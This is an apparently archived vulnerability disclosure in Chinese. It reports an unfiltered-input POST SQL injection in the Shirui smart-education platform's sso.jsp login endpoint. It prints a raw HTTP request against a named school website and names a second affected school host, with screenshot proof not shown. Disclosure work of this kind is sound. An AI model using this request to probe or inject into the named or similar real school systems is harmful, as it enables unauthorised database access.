### 简要描述:
释锐是全国领先的智慧教育解决方案供应商。致力于通过技术创新为中小学、职校、高校和教育行政管理机构提供有竞争力的智慧教育解决方案和服务,持续提升客户体验,为客户创造最大价值。目前,释锐的产品和解决方案已经应用于 25 个省市,服务全国 3000 多所学校。
此漏洞已验证,具有通用性。
### 详细说明:
以这个站为例:
POST /us/user/sso.jsp HTTP/1.1
Content-Length: 163
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.sgzx.fx.edu.sh.cn:80/
Cookie: JSESSIONID=3B6DAA95024B941442DC11D705E9486D
Host: www.sgzx.fx.edu.sh.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Password=&ssourl=http://www.sgzx.fx.edu.sh.cn/sc/user/login.jsp%3f1%3d1&type=1&url=%252fsc&Username=-1&Usertype=2
对Username和Password未过滤,造成了POST型注入,一下截图为Username字段注入的截图。
此站也存在 www.hshsh.pudong-edu.sh.cn 用的都是同一套系统。
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201407/0100330577a98dcddd4be519583b516e07d2c3e7.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/0100330577a98dcddd4be519583b516e07d2c3e7.png)
[<img src="https://images.seebug.org/upload/201407/01003324b6f43fff132cfc385d258a2a9aab2d8c.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/01003324b6f43fff132cfc385d258a2a9aab2d8c.png)
京公网安备 11010502034610号
暂无评论